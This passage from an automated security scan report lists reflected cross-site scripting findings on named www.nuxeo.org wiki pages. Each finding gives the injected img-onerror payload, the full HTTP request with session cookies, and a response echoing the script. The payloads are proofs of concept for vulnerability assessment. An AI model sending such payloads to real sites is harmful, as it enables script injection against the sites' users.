...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/FAQ8dc28%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee5ffb44f0ee/">FAQ8dc28<img src=a onerror=alert(1)>e5ffb44f0ee</a>
...[SNIP]...

1.35. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1 was submitted in the REST URL parameter 4. This input was echoed as 58367"><img src=a onerror=alert(1)>5591b8e1ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ58367"><img%20src%3da%20onerror%3dalert(1)>5591b8e1ed1/DownloadingNuxeoSources HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13132
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ58367%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5591b8e1ed1/DownloadingNuxeoSources?format=xar&amp;name=FAQ58367"><img src=a onerror=alert(1)>5591b8e1ed1.DownloadingNuxeoSources&amp;pages=FAQ58367">
...[SNIP]...

1.36. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 was submitted in the REST URL parameter 5. This input was echoed as dd998"><img src=a onerror=alert(1)>abc85857786 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/DownloadingNuxeoSourcesdd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13116
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/DownloadingNuxeoSourcesdd998%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eabc85857786?format=xar&amp;name=FAQ.DownloadingNuxeoSourcesdd998"><img src=a onerror=alert(1)>abc85857786&amp;pages=FAQ.DownloadingNuxeoSourcesdd998">
...[SNIP]...

1.37. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/DownloadingNuxeoSources

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 was submitted in the REST URL parameter 5. This input was echoed as 3aa95<img src=a onerror=alert(1)>d376d3b62f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:00 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13054
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed376d3b62f2'>DownloadingNuxeoSources3aa95<img src=a onerror=alert(1)>d376d3b62f2</a>
...[SNIP]...

1.38. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91 was submitted in the REST URL parameter 4. This input was echoed as a33f4<img src=a onerror=alert(1)>95c2826bc91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQa33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91/LDAPSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12884
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/FAQa33f4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95c2826bc91/">FAQa33f4<img src=a onerror=alert(1)>95c2826bc91</a>
...[SNIP]...

1.39. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a was submitted in the REST URL parameter 4. This input was echoed as c16a0"><img src=a onerror=alert(1)>31ada847d4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQc16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a/LDAPSetup HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQc16a0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31ada847d4a/LDAPSetup?format=xar&amp;name=FAQc16a0"><img src=a onerror=alert(1)>31ada847d4a.LDAPSetup&amp;pages=FAQc16a0">
...[SNIP]...

1.40. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 was submitted in the REST URL parameter 5. This input was echoed as 5070b"><img src=a onerror=alert(1)>fc9a2887578 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/LDAPSetup5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:53 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12934
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/LDAPSetup5070b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Efc9a2887578?format=xar&amp;name=FAQ.LDAPSetup5070b"><img src=a onerror=alert(1)>fc9a2887578&amp;pages=FAQ.LDAPSetup5070b">
...[SNIP]...

1.41. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/FAQ/LDAPSetup

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 was submitted in the REST URL parameter 5. This input was echoed as 8e8b8<img src=a onerror=alert(1)>61eca1214c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/FAQ/LDAPSetup8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12872
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup8e8b8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E61eca1214c4'>LDAPSetup8e8b8<img src=a onerror=alert(1)>61eca1214c4</a>
...[SNIP]...

1.42. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c was submitted in the REST URL parameter 4. This input was echoed as 883c9"><img src=a onerror=alert(1)>af89e0dea9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c/ HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:00:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=78A0BE22BEAC05AFF375FF19572707F9; Path=/xwiki
Set-Cookie: visitid=09EFPUXSZN169ZNGLMQT1PAAT0E1VQX9; Path=/
Via: 1.1 www.nuxeo.org
Content-Length: 12909

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main883c9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaf89e0dea9c/WebHome?format=xar&amp;name=Main883c9"><img src=a onerror=alert(1)>af89e0dea9c.WebHome&amp;pages=Main883c9">
...[SNIP]...

1.43. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe was submitted in the REST URL parameter 4. This input was echoed as 5aa3d<img src=a onerror=alert(1)>dfd0885cdbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe/ HTTP/1.1
Accept: */*
Referer: http://sfwk.org/Community/SeamInProduction
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.org
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:01:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=BE6193AFA1980F364551483A4D5729AF; Path=/xwiki
Set-Cookie: visitid=FXOAWSE7OHZEHURNNDFQOSCOMRPDEOQF; Path=/
Via: 1.1 www.nuxeo.org
Content-Length: 12843

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main5aa3d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Edfd0885cdbe/">Main5aa3d<img src=a onerror=alert(1)>dfd0885cdbe</a>
...[SNIP]...

1.44. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc was submitted in the REST URL parameter 4. This input was echoed as d8263<img src=a onerror=alert(1)>e718aef40bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maind8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc/Ajax4JSF+Good+practices HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13083
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maind8263%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee718aef40bc/">Maind8263<img src=a onerror=alert(1)>e718aef40bc</a>
...[SNIP]...

1.45. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181 was submitted in the REST URL parameter 4. This input was echoed as 4463e"><img src=a onerror=alert(1)>9bc0f92181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181/Ajax4JSF+Good+practices HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13136
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main4463e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9bc0f92181/Ajax4JSF+Good+practices?format=xar&amp;name=Main4463e"><img src=a onerror=alert(1)>9bc0f92181.Ajax4JSF Good practices&amp;pages=Main4463e">
...[SNIP]...

1.46. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 was submitted in the REST URL parameter 5. This input was echoed as 11711"><img src=a onerror=alert(1)>f6ef0055e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Ajax4JSF+Good+practices11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13133
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Ajax4JSF+Good+practices11711%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef6ef0055e76?format=xar&amp;name=Main.Ajax4JSF Good practices11711"><img src=a onerror=alert(1)>f6ef0055e76&amp;pages=Main.Ajax4JSF Good practices11711">
...[SNIP]...

1.47. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Ajax4JSF+Good+practices

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a was submitted in the REST URL parameter 5. This input was echoed as bbc96<img src=a onerror=alert(1)>aa677fb915a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
